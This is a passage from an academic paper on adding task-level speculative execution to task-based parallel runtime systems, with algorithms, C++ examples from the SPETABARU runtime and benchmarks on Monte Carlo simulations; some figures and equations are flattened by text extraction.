generate the graph and guarantee that the parallel execution will have the absolute same result as a sequential one. This ends in a very compact code with few modifications required to add to an existing application by moving the complexity in the RS. In our work, we use the STF model. There now exist numerous different task-based RS’s. The most popular ones are implementations of the OpenMP version 4 (OpenMP Architecture Review Board, 2013) standard that defines the additional pragma keyword depend to inform the RS about the type of data accesses performed by the tasks. However, using pragmas, in general, is tedious when a task has hundreds of dependencies or when the number of dependencies are known at runtime, because it ends up being an ugly and error-prone code. In addition, as OpenMP is a standard, it is upgraded slowly to ensure backward compatibility. Moreover, the standard is weak in the sense that it does not impose any constraints on the implementation and complexity of the underlying algorithms. This can cause performance surprises for the user when compared to different OpenMP RS’s. Nonetheless, its portability, stability, and maturity make it a safe long-term choice. Additionally, some industrial RS’s have been defined, such as the Intel Threading Building Blocks (ITBB), C++ library (Intel, 2017b). It allows building of graphs using the PTG model, but it also supports various other features such as memory allocation management and parallel containers. PaRSEC (Danalis et al., 2014) is another RS based on Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.183 5/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.183 the PTF model that had been demonstrated to be effective in various scientific applications. CHARM++ (Kale & Krishnan, 1993) is a C++-based parallel programming system. It includes the parallelism by design with a migratable-objects programming model, and it supports task-based execution. SMPSs (Perez, Badia & Labarta, 2008), now included in OmpSs (Duran et al., 2011), is a RS based on the STF model that defined what later became the OpenMP tasks. It uses pragmas annotation to inform the RS about data access by the tasks. StarPU (Augonnet et al., 2011) is an RS that was first designed to manage heterogeneous architectures. It is a C library such that the user has to use low-level programming and function pointers. However, it is extremely flexible and it is capable of having distributed memory STF. XKaapi (Gautier et al., 2013) is an RS that can be used with standard C++ or with specific annotation but which needs a given compiler. Legion (Bauer et al., 2012) is a data-centric programming language that allows for parallelization with a task-based approach. SuperGlue (Tillenius, 2015) is lightweight C++ task-based RS. It manages the dependencies between tasks using a data version pattern. Most of these tools support a core part of task-based RS, such as creating a graph of tasks (even if it is implemented differently) where tasks can read or write data. However, scheduling is an important factor in the performance (Agullo et al., 2016a), and few of these RS’s propose a way to create a scheduler easily without having to go inside the RS’s code. Moreover, specific features provide mechanisms to increase the degree of parallelism. For instance, some RS’s allow specification of whether data access is commutative, meaning that the tasks write data but the order is not important. This kind of advanced functions can make a big difference in terms of performance (Agullo et al., 2017). We refer to Thoman et al. (2018) for a more in-depth comparison of the RS’s. To the best of our knowledge, none of them propose a speculation system. But any of the STF based RS could easily implement our strategy to use speculation. Speculative execution Speculation is the principle of guessing without being certain in order to make a profit. It is commonly used at the instruction level in CPU hardware to fill the pipeline of instruction when there is a branch, to prefetch the memory, to manage the memory dependence, and to use transactional memory. In our system, the speculation is at the application level, or more precisely, at the task level. Therefore, it has very different constraints, advantages, and disadvantages compared to hardware-based speculation. On the other hand, it requires managing copies and synchronizations at a high level, too. The two main speculation strategies are called eager and predictive. Eager execution computes all paths, and this is usually not realistic because there are too many of them and because the real path may actually be found only once the results are known. Predictive execution is the more common strategy; in this model, the execution follows a path until we know if the prediction is true. A common speculation pattern is called thread level speculation (TLS). In Steffan & Mowry (1998), the authors describe how TLS was expected to improve parallel performance of non-numeric applications. The idea is to mimic the instruction speculation by the compiler by, for example, reordering instruction to move a load ahead of a store. At Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.183 6/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.183 Figure 1 Graph of four tasks where B is task that will potentially modify the data. Full-size DOI: 10.7717/peerjcs.183/fig-1 execution time, if the speculation appears unsafe, a recovery method should be used. TLS is somewhat similar, but the load and store are performed by two different threads. A speculation is then safe if the execution of a load does not target a location that will be modified by a store, which should have already been done. The main problems are to provide a system to control the safety at low costs and how the compiler can automatically insert speculative code. Consequently, many researchers have defined new hardware that would make the TLS or a similar pattern possible, such as in Jeffrey et al. (2015). But many of these research projects are tied to the manufacturer’s choices. In Salamanca, Amaral & Araujo (2017), the authors discuss how instructions that currently exist in most CPUs to manage transactional memory (TM) could be used to implement TLS. They show that TLS is already possible but that false-sharing, coming from the size of the element the TM instructions are working on, can significantly decrease the performance. Other speculation methods have been proposed with pure software approaches. For example, the APOLLO (APOLLO, 2016) framework is capable of speculative parallelization processes for loops of any kind (for, while, or do-while loops). It is composed of two main layers. First, an extensions to the CLANG-LLVM compiler prepares the program by generating several versions of each target loop nest and several code snippets called code bones (Martinez Caamaño et al., 2017). During the execution, the RS orchestrates the execution of the different code versions by chunks. Our approach is different; because it is high level and not designed for a few instructions, it does not require special hardware instruction, and it is designed for applications that are already parallel at the top of a graph of tasks. SPECULATION IN TASK-BASED RUNTIME SYSTEMS Description Consider a simple graph of tasks as shown in Fig. 1 where four tasks access the same data. Here, task B may or may not write data, but to ensure a correct execution, we must use WRITE data access, and so the dependency between B and C is strict. In our approach, we allow the programmer to indicate that a task will potentially WRITE data, that is, there is a condition in the task that will make the modification effective or not. Then, at the end of the task’s execution, this one informs the RS to detail whether or not the data was modified. In doing this, the RS knows that speculation is possible, and it can create extra tasks as shown in Fig. 2. When an uncertain task (a task with at least one potential WRITE) is inserted, the RS creates a copy-task in front of it, a speculative task and a select task. At runtime, if the speculation is enabled, the RS has to manage them to Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.183 7/25 https://peerj.com https://doi.org/10.7717/peerjcs.183/fig-1 http://dx.doi.org/10.7717/peerj-cs.183 Figure 2 Graph of four tasks where B is an uncertain task. Extra tasks are created by the RS: copy, C’ and select. Full-size DOI: 10.7717/peerjcs.183/fig-2 B CA Copy DSelect C’ Disable Try to disable Enable a: If B wrote on the data, the RS tries to cancel C’, it enables C and disables the select. B CA Copy DSelect C’ Disable Enable b: If B did not write on the data, the RS disables C and enables the select. Figure 3 Graph of four tasks where B is an uncertain task and with speculation enabled. When B is over the RS update the next tasks, in (A) if B did write on the data, and in (B) otherwise. Full-size DOI: 10.7717/peerjcs.183/fig-3 ensure accuracy and coherency. In our example, when the speculation is enabled, both B and C’ can be computed concurrently. Then, there are two possibilities, either B modified the data or it did not. If it did, as shown by Fig. 3A, then the result of C’ is invalid and will be destroyed. In addition, the valid result from B used by C will have to be computed, and we can disable the select task. Otherwise, as shown in Fig. 3B, in the case where B did not write data, then the output of C’ is valid. C is disabled, and the select task is enabled to ensure that the valid result is used as output of this group of tasks. In terms of execution time, without speculation, we have the total duration D = D(B) + D(C). With speculation and if B writes data, then D = D(copy) + Max(D(B) + D(C), D(C’)), considering that C’ is computed at the same time as B and C and where D(C’) is zero if canceled. With speculation and if B does not write data, then D = D(copy) + Max(D(B),D(C’)) + D(select). The creation of the extra tasks can be done at the time of insertion, and thus, it does not require any specific feature from the RS. However, it implies a possible overhead since the creation of a task usually requires multiple allocations and possible synchronizations in the scheduler. The enabling and disabling of the tasks during execution do not mean that the task has to be removed from the DAG but that their core part should act as an empty function. The select tasks are functions to act as a switch and to decide which data are the valid output. For instance, in the given example, if x is the original value accessed by the tasks and x’ the copy of x accessed by C’, the select code would be x = x’. Therefore, we only have to enable the select task when we want to overwrite x by the output of C’. Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.183 8/25 https://peerj.com https://doi.org/10.7717/peerjcs.183/fig-2 https://doi.org/10.7717/peerjcs.183/fig-3 http://dx.doi.org/10.7717/peerj-cs.183 A B C D E a: Normal DAG. B CA Copy1 DSelect1 E Copy2 C’ Select2 b: If C uses the data from E in write, an extra copy and select are needed. B CA Copy DSelect E C’ c: If C uses the data from E in read nothing special is needed. Figure 4 Graph of five tasks where B is an uncertain task and where C, the task use for speculation, uses data from another task E. Full-size DOI: 10.7717/peerjcs.183/fig-4 A B C D E F a: Original DAG. B C A Copy D Select C’ FE Copy Select b: DAG if C write on both data used by B and F. Figure 5 Graph of six tasks where B and F are non consecutive uncertain tasks. Full-size DOI: 10.7717/peerjcs.183/fig-5 A B C D E F a: Original DAG. B C A Copy DSelect C’ E FSelect E’ Copy b: Graph when both C and E write on the data potentially used in B. B C A D C’ E F E’ Copy c: Graph when both C and E read on the data potentially used in B. Figure 6 Graph of six tasks where B is an uncertain task. Full-size DOI: 10.7717/peerjcs.183/fig-6 The decision to activate the speculation can be done at runtime, and the extra tasks should simply be disabled if the speculation should not happen. Multiple dependencies More advanced examples are shown in Figs. 4, 5, and 6. They show how the RS should act to speculate but still have valid and coherent execution. In Fig. 4, task C uses data from a normal task E in addition to that from the uncertain task B. Therefore, if C writes data from E, C’ does so as well. Since we do not know if C’ will be valid, we have to insert an extra copy, as shown in Fig. 4B. An additional select is also needed to select the correct data from C or C’ as the output of the task group. Otherwise, if the data from E is used in reading by C, then both C and C’ can use the same data concurrently, as shown in Fig. 4C. Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.183 9/25 https://peerj.com https://doi.org/10.7717/peerjcs.183/fig-4 https://doi.org/10.7717/peerjcs.183/fig-5 https://doi.org/10.7717/peerjcs.183/fig-6 http://dx.doi.org/10.7717/peerj-cs.183 Speculative task group (STG) In Fig. 5, we provide an example where we have more than one uncertain task but not consecutively. In this case, we need to copy all data that could be modified by the uncertain tasks B and F, and we need one select for each of them. However, there is a very important aspect here because B and F might not have the same behavior, and as a result, one could write the data while the other does not. Therefore, in our approach, we link together all the tasks that are connected inside an STG. If at least one uncertain task of the group modifies the data, then the speculation has failed no matter the result of the other uncertain tasks. It could be more fine-grained, but that would require a complex algorithm to ensure coherent progression in the DAG. In the given example, if B or F modifies the data, then the RS tries to cancel C’, enable C, and disable the selects. An STG also links the tasks used for speculation. As an example, in Fig. 6, the uncertain task B may or may not write data at two different points. One of the two is later used by C, and the other one is later used by E. Here, we consider only two cases; when C and E write data, see Fig. 6B, and when they use those data in read, Fig. 6C is used. In the first case, when B fails, the RS tries to cancel C’ and E’, enable C and E, and disable the select, while in the second case, there is no need to have a select. In our case, an STG is composed of several lists: the list of copies tasks, the list of uncertain tasks, the list of original speculative tasks, the list of speculative tasks, and the list of selects. At runtime, based on the result, the lists have to be properly managed to ensure a correct execution. The decision to enable the speculation in a task group can be done when the first copy task is ready. Since the construction of all this information is done at task insertion time, there is also the need to merge different task groups, which is simply a merge of the list, or an extra list that contains the other groups. Multiple consecutive uncertain tasks It could happen that several uncertain tasks are consecutive (directly connected in the graph). There are several ways of managing such a configuration, and Fig. 7 shows four of them. In Fig. 7A, we leave everything unchanged compared to the previous examples, but then it appears that D could speculate over C. In Fig. 7B, we show that we could perform the speculation above all the uncertain tasks. Therefore, here, we let the consecutive uncertain tasks compute one after the other. However, with this approach, the degree of parallelism remains two no matter the number of uncertain tasks. In Fig. 7C, we mix the speculation above B and C. Here, the degree of parallelism is three because C’, C, and D’ can be computed concurrently. However, again, if there are more than three uncertain tasks, the degree will remain the same. Finally, what we use is shown in Fig. 7D. Here, (B,C), C’, and D’ can be computed concurrently, and the degree of parallelism will increase with the number of uncertain tasks. Speedup for one or multiple consecutive uncertain tasks The expected speedup is, of course, a matter of probability depending on the success rate of the speculation. For instance, let us consider that we have N consecutive uncertain tasks Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.183 10/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.183 B CA Copy DSelect C’ E a: Alternative 1: no speculation is done on C. B CA Copy D E D’ Select b: Alternative 2: task D speculates above B and C. B CA Copy DSelect C’ E D’ SelectCopy c: Alternative 3: speculation is used successively on each uncertain task. B CA Copy DSelect C’ E D’ Select Copy d: Alternative 4: Multiple speculation paths are used. Figure 7 Graph of four tasks where B and C are tasks that will potentially modify the data. Full-size DOI: 10.7717/peerjcs.183/fig-7 followed by a normal task all of the same cost t, negligible copies/selects, and at least N available workers. The speedup will be, on average, S= (N +1)×t (N +1)×t−DN (1) DN = N∑ i=1  t×i×Pi+1× i∏ j=1 (1−Pj)   (2) PN+1=1 (3) where DN is the average duration gain, and Pi is the probability for the task of index i to write data. In Eq. (2), we compute DN with a sum over the average gain when each of the uncertain tasks write data. For instance, when task i+1 writes data but all its predecessor tasks do not, we obtain an average gain of i×t with a probability of Pi+1× ∏j≤i j=1(1−Pj). In Eq. (3), PN+1 is set to 1 because the definition specifies that the (N +1)th task is a normal task that always writes on the data. If the probability is 1/2 for all uncertain tasks, then we have: D1/2= t× ( N−1∑ i=1 ( i 2i+1 ) + N 2N ) . (4) We provide the speedup in Table 1, if we consider an execution as a unit with t =1 and we have N uncertain tasks followed by one normal task. Multiple consecutive uncertain tasks (eager extension) Our objective that is not yet implemented in our RS is presented in Fig. 8. Here, we create all the tasks necessary to be able to restart the speculation process when it fails. However, it requires the creation of (N 2+N)/2−N speculative tasks, with N being the number of consecutive uncertain tasks, plus the copy and select tasks. Many of these tasks will be disabled by default and enabled only when a speculation fails. However, in terms of performance, any non-modification of the result provides a benefit of t. Therefore, the average duration gain F(N) is given by Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.183 11/25 https://peerj.com https://doi.org/10.7717/peerjcs.183/fig-7 http://dx.doi.org/10.7717/peerj-cs.183 Table 1 Gain in time D (percentage of one task) and speedup when the probability of invalid specula- tion is either 1/4, 1/2 or 3/4. N 1 2 3 4 5 6 7 D1/4 0.75 1.31 1.73 2.05 2.29 2.47 2.6 S1/4 1.6 1.78 1.77 1.7 1.62 1.54 1.48 D1/2 0.5 0.75 0.875 0.938 0.969 0.984 0.992 S1/2 1.33 1.33 1.28 1.23 1.19 1.16 1.14 D3/4 0.25 0.312 0.328 0.332 0.333 0.333 0.333 S3/4 1.14 1.12 1.09 1.07 1.06 1.05 1.04 B CA Copy D Select C’ E D’ Select Copy D’’ Copy Select Figure 8 Graph of four tasks where B and C are uncertain tasks. Extra tasks are created by the RS: C’, D’, D’’ and several copies/selects. Full-size DOI: 10.7717/peerjcs.183/fig-8 F(N)=F(N −1)×PN +(F(N −1)+t)×(1−PN ) (5) =F(N −1)+t×(1−PN ) (6) F(0) =0. (7) where Pi is the probability for the task of index i to write data. In Eq. (5), we compute F(N) by summing first the gain when task N writes data, which happens with a probability PN , and second the gain when task N does not write data, which happens with a probability 1−PN . The formula is recursive and can be rewritten by F(N)= t× N∑ i=1 1−Pi. (8) Another way to describe this formula is to consider that if we have N uncertain tasks, we first compute task 0 and speculate over it with duplicate of tasks from 1 to N . If tasks i writes data, then we will have to compute task i+1 and speculate over it with duplicate of tasks from i+2 to N . We do so until no tasks write data or the N th is computed. The average speedup is given by S= (N +1)×t (N +1)×t−F(N) . (9) Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.183 12/25 https://peerj.com https://doi.org/10.7717/peerjcs.183/fig-8 http://dx.doi.org/10.7717/peerj-cs.183 For a probability of 1/2 for all uncertain tasks, the average speedup is then equal to 2 no matter the number of consecutive speculative tasks. Changing the DAG on the fly From the execution shown in Fig. 2, the question can be asked if the behavior could be different when C’ is over before B. It would be interesting to speculate for D, too, by creating a task D’ and the corresponding copy and select. However, we have decided not to do so because it requires modifying the DAG on the fly. This is a difficult operation to implement and one that most RS’s do not support. ALGORITHM 3: Uncertain task insertion. 1 function insert_uncertain_task(t) 2 // Clean the duplicate data handles if one is used in READ mode and it is used by t not in READ mode 3 global_duplicates.clean_if_in_read(t.data in READ) 4 // Find the spec-groups related to t, groups 5 groups← global_duplicates.find_spec_groups(t.data) 6 if one of them is disabled or groups is empty then 7 // Remove the duplicates related to t (not the one just inserted) 8 global_duplicates.remove_any_kind(t.data) 9 // Duplicate the data used by t in MAYBE-WRITE, list l1 10 l1← create_duplicate(t.data in MAYBE-WRITE) 11 // Insert t without speculation 12 internal_insert(t) 13 // Add l1 to the global list 14 global_duplicates.append(l1) 15 // Create a new group 16 g← create_group_with_no_parent() 17 g.set_main_task(t) 18 end 19 else 20 // Duplicate the data used by t in MAYBE-WRITE, list l1 21 l1← create_duplicate(t.data in MAYBE-WRITE) 22 // Create a new group with groups as parents 23 g← create_group_with_parents(groups) 24 g.add_copy_tasks(l1.copy_tasks) 25 // Duplicate the data used by t in MAYBE-WRITE that are already duplicated (list l1p) (inform g) 26 l1p← create_duplicate(t.data in MAYBE-WRITE and exist in global_duplicates) 27 g.add_copy_tasks(l1p.copy_tasks) 28 // Duplicate the data used by t in WRITE that are not already duplicated (list l2) (inform g) 29 l2← create_duplicate(t.data in WRITE and do not exist in global_duplicates) 30 g.add_copy_tasks(l2.copy_tasks) 31 // Insert t as a normal task (inform g) 32 g.set_main_task(t) 33 internal_insert(t) 34 // Insert t as a speculative task using data duplicates, l1 and l2 and the global list (inform g) 35 internal_speculative_insert(t, l1, l2) 36 // Add select tasks and clean duplicates (inform g) 37 select_tasks← create_select_tasks() 38 g.add_select_tasks(select_tasks) 39 // Add l1p in the global list 40 global_duplicates.append(l1p) 41 end Algorithms Speculative task group The STG contains lists of tasks that are all connected to the same uncertain tasks’ results. It has a state, which can be undefined, enable or disable, and a result that indicates if one Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.183 13/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.183 ALGORITHM 4: Normal tasks insertion. 1 function insert_normal_task(t) 2 // Clean the duplicate data handles if one is used in READ mode and it is used by t not in READ mode 3 global_duplicates.clean_if_in_read(t.data in READ) 4 if no data used by t have been duplicated then 5 // Simply insert t, there is no speculation to do 6 internal_insert(t) 7 end 8 else 9 // Find the spec-groups groups related to t 10 groups← global_duplicates.find_spec_groups(t.data) 11 if one of them is disabled then 12 // We already know that the speculation has failed 13 // Remove the duplicates related to t 14 global_duplicates.remove_any_kind(t.data) 15 // Insert t without speculation 16 internal_insert(t) 17 end 18 else 19 // Build a new group with groups as parents 20 g← create_group_with_parents(groups) 21 // Duplicate the data used by t in WRITE mode that are not already duplicate (list l2) (inform g) 22 l2← create_duplicate(t.data in WRITE and do not exist in global_duplicates) 23 // Insert t as a normal task (inform g) 24 g.set_main_task(t) 25 internal_insert(t) 26 // Insert t as a speculative task using data duplicates, using l2 (inform g) 27 internal_speculative_insert(t, l1, l2) 28 // Add select tasks (use l2) and clean duplicates (inform g) 29 select_tasks← create_select_tasks() 30 g.add_select_tasks(select_tasks) 31 end 32 end of the uncertain tasks did write data. An STG also has a list of predecessor STGs and a list of successor STGs. In fact, if an STG is enabled and running and the uncertain task did not modify the data such that the speculation succeeded, then if a new tasks is inserted and uses data from this task group and another, they should be connected. Task insertion In Algorithm 3, we give an overview of the task insertion algorithm of an uncertain task, and in Algorithm 4, we give that of a normal task. The algorithm uses a list called global_duplicates to save the duplicate data from the copy tasks inserted before the uncertain tasks. For instance, when a task is inserted, we can look up whether one of its dependencies has been duplicated or not. However, the difficulty arises from the construction at task insertion time, that is without a posteriori and without knowing what tasks will come next. Therefore, in order to have executions as defined in ‘Description’, we have to determine if there is a duplicate and if the related STGs have been disabled or failed. Also, we need to create a duplicate of the data but without using them for the current task, which is why we store the duplicate information in some other lists before adding them to the global_duplicates after the task has been inserted. At execution During the execution, the RS has to decide if the speculation is enabled or not. It is convenient to do this when the first copy task of an STG becomes ready to be executed. In Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.183 14/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.183 1The project is open-source and available at https://gitlab.inria.fr/bramas/spetabaru. fact, the decision process can then use information such as the current number of ready tasks in the scheduler. Then, the tasks have to be enabled or disabled accordingly. After any uncertain task has finished, the RS has to enable or disable tasks related to the STG. It has to iterate over the lists of the STG and, potentially, on its successor. The DAG remains unchanged, and so any RS that has a callback and activation/deactivation features can implement our mechanism. Implementation (SPETABARU) We have implemented our speculation method on top of a lightweight C++ RS that was originally less than 3,000 lines.1 We use modern C++17 and advanced meta-programming to look at data dependencies at compile time. The RS supports the data access modes of read, write, atomic_write, and commute (for commutative operations). We also use a dynamic array view, which allows for having an unlimited number of known dependencies at execution time. It is possible to use lambda/anonymous functions as tasks, as shown in Code 1. 1 // Create the runtime 2 const int NumThreads = SpUtils::DefaultNumThreads(); 3 SpRuntime runtime(NumThreads); 4 const int initVal = 1; 5 int writeVal = 0; 6 7 // Create a task with lambda function 8 runtime.task(SpRead(initVal), SpWrite(writeVal), 9 [](const int& initValParam, int& writeValParam){ 10 writeValParam += initValParam; 11 }); 12 // Create a task with lambda function (that returns a bool) 13 auto returnValue = runtime.task(SpRead(initVal), SpWrite(writeVal), 14 [](const int& initValParam, 15 int& writeValParam) -> bool { 16 writeValParam += initValParam; 17 return true; 18 }); 19 20 // Wait completion of a single task 21 returnValue.wait(); 22 // Get the value of the task 23 const bool res = returnValue.getValue(); 24 // Wait until two tasks (or less) remain 25 runtime.waitRemain(2); 26 // Wait for all tasks to be done 27 runtime.waitAllTasks(); 28 // Save trace and .dot 29 runtime.generateTrace("/tmp/basis-trace.svg"); 30 runtime.generateDot("/tmp/basis-dag.dot"); Code 1: SPETABARU example. The example of an uncertain task is given in Code 2. Compared to a regular task, the keyword SpMaybeWrite replaces SpWrite and the function returns a boolean to inform the RS if a modification occurs. 1 runtime.potentialTask(SpMaybeWrite(val), [](int& /*valParam*/) -> bool { 2 return false; // val has not been modified 3 }); Code 2: Example of creating an uncertain task in SPETABARU. Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.183 15/25 https://gitlab.inria.fr/bramas/spetabaru https://peerj.com http://dx.doi.org/10.7717/peerj-cs.183 2The current publication includes, as supplementary material, the bash script used to execute the simulations and to post-process the results, in addition to the full output of the executions. 1 Task A : write(val) 2 Task B uncertain : maybe-write(val) -> false 3 Task C uncertain : maybe-write(val) -> true 4 Task D : write(val) (a) Description of the tasks. A B C D (b) DAG without speculation. A sp-copy sp-copy B D' C' C (Disabled) sp-select (Disabled) sp-select D (c) DAG with speculation. 1 Figure 9 Execution example with four tasks. B and C are uncertain tasks and here B did not write on the data, while C did. Consequently, the RS has disabled or enabled the other tasks accordingly. Full-size DOI: 10.7717/peerjcs.183/fig-9 Execution example We show in Figs. 9 and 10 two examples and their execution results. The description of the tasks we insert are given in Figs. 9A and 10A, respectively. Those descriptions also indicate the result of the uncertain tasks known during execution at the end of the tasks, where true means that the task writes on the data and that otherwise, it did not. The DAGs without speculation are given in Figs. 9B and 10B, and the DAGs with speculation in Figs. 9C and 10C, respectively. In Fig. 9C, after B is executed, the RS knows that B did not change any data. Therefore, it disables C and enables the merge. However, once C’ is complete, the RS knows that it wrote data. Consequently, the RS must enable D and disable the merge. It also tried to disable D’ but the result visible on the DAG indicates that this was too late. In Fig. 10C, a more complex execution happened. Since B did not write data, C has been disabled and the corresponding select has been enabled. However, since D and E did write data, then F and G have been enabled, and the two last selects have been disabled. PERFORMANCE STUDY Configuration Software/Hardware We used an Intel Xeon E5-2680 v3 with a frequency of 2.5 GHz and 2 sockets of 12 cores each. We compiled using the GNU compiler version 7.2, and we bound the threads to the cores following a compact strategy, e.i. the threads are pinned to contiguous cores. We use SPETABARU available on the public master branch at tag v0.15.2 Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.183 16/25 https://peerj.com https://doi.org/10.7717/peerjcs.183/fig-9 http://dx.doi.org/10.7717/peerj-cs.183 1 Task A : write(val1),write(val2),write(val3) 2 Task B uncertain : maybe-write(val1) -> false 3 Task C uncertain : maybe-write(val1) -> true 4 Task D uncertain : maybe-write(val2) -> true 5 Task E uncertain : maybe-write(val3) -> true 6 Task F : ... write(val1),write(val2),write(val3) (a) Description of the tasks. A B D E C F G (b) DAG without speculation. A sp-copy sp-copy sp-copy sp-copyB F'D G' E C'C (Disabled) sp-select (Disabled) sp-select (Disabled) F sp-select G (c) DAG with speculation. 1 Figure 10 Execution example with seven tasks. B, C, D and E are uncertain tasks and here B did not write on the data, while C, D and E did. Consequently, the RS has disabled or enabled the other tasks accordingly. Full-size DOI: 10.7717/peerjcs.183/fig-10 Test case We evaluated our approach on an MC simulation composed of five domains, where each domain had 2,000 particles. The reject/accept ratio was around 0.4, and we executed the simulation for 1 to 100 iterations. We computed the Lennard-Jones potential between the particles to obtain the global energy. The moves (particle update) are a simple random distribution of the particles in the simulation box. For the REMC, we used five replicas and performed a replica exchange every three iterations. The exchange rate between replicas was approximately 0.7. Execution times are obtained by doing the average of 5 runs. The deviation is not given in the results because it is really limited (less than 1% in most cases). This is due to the kernels that are highly computational intensive with limited memory transfers, and because many threads remains idle for a significant amount of time during the execution, which help to get a limited contention effect. MC We compared three approaches: • Task-based: We used the task-based execution as baseline. However, since there is no degree of parallelism between the iteration of the loops it is equivalent as a sequential execution. • Speculative Spec(T,S): Here, T represents the number of threads and S the number of consecutive uncertain tasks inserted before inserting a normal task. The speculation is always enabled. • Reject Rej(T): Here, T represents the number of threads and S the number of consecutive uncertain tasks inserted before inserting a normal task. In this configuration, we looked Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.183 17/25 https://peerj.com https://doi.org/10.7717/peerjcs.183/fig-10 http://dx.doi.org/10.7717/peerj-cs.183 Total time = 1.808037 s T h re a d 0 T h re a d 1 T h re a d 2 T h re a d 3 T h re a d 4 S u b m it e d R e a d y 7 1 a: Task-based - 1 iteration - 1.8s Total time = 1.563777 s T h re a d 0 T h re a d 1 T h re a d 2 T h re a d 3 T h re a d 4 S u b m it e d R e a d y 32 18 b: Spec(T=5/S=5) - 1 iteration - 1.56s Total time = 0.846159 s T h r e a d 0 T h r e a d 1 T h r e a d 2 T h r e a d 3 T h r e a d 4 S u b m it e d R e a d y 48 12 c: Rej(T=5/S=5) - 1 it- eration - 0.84s Total time = 2.117699 s Th re ad 0 Th re ad 1 Th re ad 2 Th re ad 3 Th re ad 4 Su bm ite d Re ad y 72 17 d: Spec(T=5/S=10) - 2 iterations - 2.11s Total time = 1.913299 s Th re ad 0 Th re ad 1 Th re ad 2 Th re ad 3 Th re ad 4 Su bm ite d Re ad y 95 28 e: Spec(T=5/S=5) - 2 iterations - 1.91s Figure 11 Execution traces of the MC simulation for different configurations. We compute one itera- tion in (A), (B) and (C). We compute two iterations in (D) and (E). Legend: initial energy computation, move and energy recomputation, and speculative move and energy recomputation. Full-size DOI: 10.7717/peerjcs.183/fig-11 at the performance when all changes are rejected to provide a reference as possible speedup if all the speculations were successful. This is not a realistic execution for an MC simulation because it would mean that all moves are rejected. The speculation is always enabled. The tasks are created such that they represent one iteration of the loop line 8 in Algorithm 1. They include the move, the computation of the energy and the test for acceptance for a single domain. Consequently, each task accesses in maybe write the energy matrix and one of the domains, and in read all the other domains. We show in Fig. 11 the execution trace to compute one or two iterations, where each of the five domains are moved once per iteration. Figure 11A is simply giving the baseline with a task-based execution, but since there is no parallelism we obtain a sequential execution on multiple cores. In Fig. 11B, we see that a normal move/computation task is executed together with four speculative tasks. We can see that the first move was rejected but not the second one. Therefore, the process continued by computing the normal last three moves. In Fig. 11C, we see what would be the execution if all the moves were rejected. In such case, all speculation would be correct and only one normal task would be computed. In Fig. 11D, we compute two iterations but the 2×5 uncertain move/computations were inserted consecutively. Consequently, as the second move is rejected, the following eight moves/computations have to be computed normally. To avoid this huge penalty, we can Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.183 18/25 https://peerj.com https://doi.org/10.7717/peerjcs.183/fig-11 http://dx.doi.org/10.7717/peerj-cs.183 reduce the number of consecutive tasks we insert as shown in Fig. 11E. Here, we restart a new speculative process at each iteration, which limits the degree of parallelization to five (the number of domains) but avoids canceling a complete set of speculative tasks. This means that in the code we manually insert an normal task instead of what could have been a uncertain task to ensure restarting a speculation process afterward. In Fig. 12A, we provide the performance result for the MC simulation. We look at the gain in performance by using speculation but also at the difference for the speculation degree. We see that as the number of iterations increases, the speedup stabilizes around 40%, which is above the theoretical result for a probability of 0.5 provided in Table 1. Similarly, the upper bound Rej(T=5/S=5) gets closer to five. REMC We compare three approaches: • Task-Based: Since there is no degree of parallelism inside the MC, the maximum parallelism in obtained through the concurrency between replicas. • Speculative Spec(T,S): Here, T represents the number of threads and S the number of consecutive uncertain tasks inserted before inserting a normal task. The speculation is always enabled. • Reject Rej(T): Here, T represents the number of threads and S the number of consecutive uncertain tasks inserted before inserting a normal task. In this configuration, we look at the performance when all changes are rejected to provide a reference as possible speedup if all the speculations were successful. This is not a realistic execution for an MC simulation. The speculation is always enabled. Since using speculation creates more work and more tasks to compute, we see that enabling the speculation in all cases could lead to an overhead. This is illustrated in Fig. 13A by the configuration Spec(T=5/S=4). However, using more threads allows better performance, as shown by configurations Spec(T=10/*) and Spec(T=20/*). In terms of speedup, increasing the number of consecutive speculative tasks does not improve the performance. For instance, S=2 is always faster because the speculation succeed with a probability of only 0.3 (see Fig. 13B). Of course, we see that having more threads increases the all reject configuration Rej performance, and more precisely the more threads we have the faster it executes. CONCLUSION In the current paper, we provided the first results of using speculation in task-based RS’s. We described a general pattern and the algorithm of a predictive-oriented approach. Our RS, SPETABARU, is able to execute speculative task flows, and we demonstrate that the obtained speedup for both the MC and REMC is close to the theoretical one of 30%, when the probability to accept changes is 1/2. The mechanism we proposed can be easily incorporated in any other runtime system. However, the fact that we used the C++ language is an important asset because it makes it possible to generate functions capable of copying Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.183 19/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.183 1 10 100 1 10 100 Number of iterations T im e (s ) Task-based Spec(T=5/S=1) Spec(T=5/S=2) Spec(T=5/S=3) Spec(T=5/S=4) Spec(T=5/S=5) Rej(T=5/S=5) (a) Execution time 1 5 10 25 50 100 1 1.5 2 2.5 3 3.5 4 4.5 5 1. 15 1. 41 1. 32 1 .4 4 1. 37 1. 36 1. 36 1. 57 1. 47 1. 47 1. 38 1. 38 1. 15 1. 66 1. 36 1. 6 1. 4 1. 37 1. 15 1. 41 1. 4 1. 4 1. 31 1. 36 1. 15 1. 41 1. 36 1. 36 1. 24 1. 25 2. 14 3. 64 4. 16 4. 59 4. 76 4 .8 5 